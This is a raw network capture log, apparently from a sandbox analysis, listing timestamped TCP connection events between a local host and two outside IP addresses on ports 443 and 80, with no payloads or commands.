                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.307867050 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.421365976 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.426270008 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.426345110 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.426939011 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.431682110 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.694200993 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.694717884 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.694730043 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.695192099 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.695199966 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.825265884 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.825361967 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.825407028 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.825484991 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.825495005 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.825505972 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.825510025 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.827833891 CET63807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.827848911 CET4436380713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.827917099 CET63807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.828027010 CET63807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.828036070 CET4436380713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.905644894 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.905992031 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.905999899 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.906315088 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.906354904 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.906358957 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.906569958 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.906588078 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.906862974 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.906867981 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.936151028 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.936454058 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.936470985 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.936794996 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.936800957 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.036257982 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.036569118 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.036624908 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.036679029 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.036696911 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.036712885 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.036727905 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.039254904 CET63808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.039266109 CET4436380813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.039331913 CET63808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.039479017 CET63808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.039488077 CET4436380813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.041753054 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.041847944 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.041897058 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.041979074 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.041985035 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.042010069 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.042012930 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.044106007 CET63809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.044127941 CET4436380913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.044198990 CET63809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.044311047 CET63809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.044322014 CET4436380913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.047286034 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.047630072 CET63805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.047637939 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.048000097 CET63805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.048003912 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.070955992 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.071089983 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.071155071 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.071183920 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.071198940 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.071208000 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.071212053 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.073003054 CET63810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.073012114 CET4436381013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.073084116 CET63810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.073224068 CET63810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.073232889 CET4436381013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090641975 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090756893 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090771914 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090781927 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090792894 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090794086 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090802908 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090812922 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090814114 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090826035 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090835094 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090845108 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090852976 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090877056 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090909958 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.095634937 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.095644951 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.095655918 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.095686913 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.136006117 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.178797960 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.179090977 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.179178953 CET63805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.179286957 CET63805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.179286957 CET63805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.179294109 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.179302931 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.182450056 CET63811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.182477951 CET4436381113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.182552099 CET63811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.182871103 CET63811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.182883978 CET4436381113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212330103 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212341070 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212356091 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212368011 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212378025 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212388992 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212399006 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212399006 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212402105 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.212431908 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213202000 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213231087 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213241100 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213247061 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213253975 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213299036 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213747025 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213757992 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213769913 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213781118 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213804960 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213804007 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213819981 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.213860035 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.214584112 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.214632034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.214648962 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.214663029 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.214668989 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.214673996 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.214703083 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.215435982 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.215445995 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.215472937 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.258878946 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.258914948 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.258919954 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.258924961 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.258959055 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334253073 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334271908 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334284067 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334294081 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334311008 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334321022 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334326029 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334332943 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334368944 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334640980 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334652901 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334662914 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334686995 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334692001 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334702969 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334712982 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334716082 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334723949 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334749937 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.334774971 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335623980 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335634947 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335644960 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335654974 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335666895 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335668087 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335675955 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335685968 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335707903 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.335735083 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336431026 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336473942 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336496115 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336508036 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336538076 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336545944 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336558104 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336568117 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336582899 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336594105 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.336633921 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337387085 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337426901 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337438107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337449074 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337459087 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337460041 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337470055 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337483883 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337486982 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.337510109 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338206053 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338244915 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338251114 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338262081 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338272095 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338282108 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338298082 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.338326931 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.374650002 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.374661922 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.374671936 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.374707937 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380701065 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380717039 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380727053 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380737066 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380748034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380759001 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380759954 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380783081 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.380810022 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455604076 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455615044 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455625057 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455645084 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455656052 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455672026 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455682993 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455684900 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455694914 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455708027 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455717087 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455724001 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455744028 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455763102 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455874920 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455885887 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455894947 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455924034 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455946922 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.455957890 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456000090 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456290007 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456300974 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456310987 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456329107 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456347942 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456357002 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456358910 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456368923 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456379890 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456393003 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456394911 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456403971 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456407070 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456413984 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.456453085 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457120895 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457165956 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457165956 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457178116 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457210064 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457220078 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457237005 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457247972 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457261086 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457288027 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457317114 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457329035 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457339048 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457350016 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.457360983 CET8063806208.109.77.116192.168.2.4
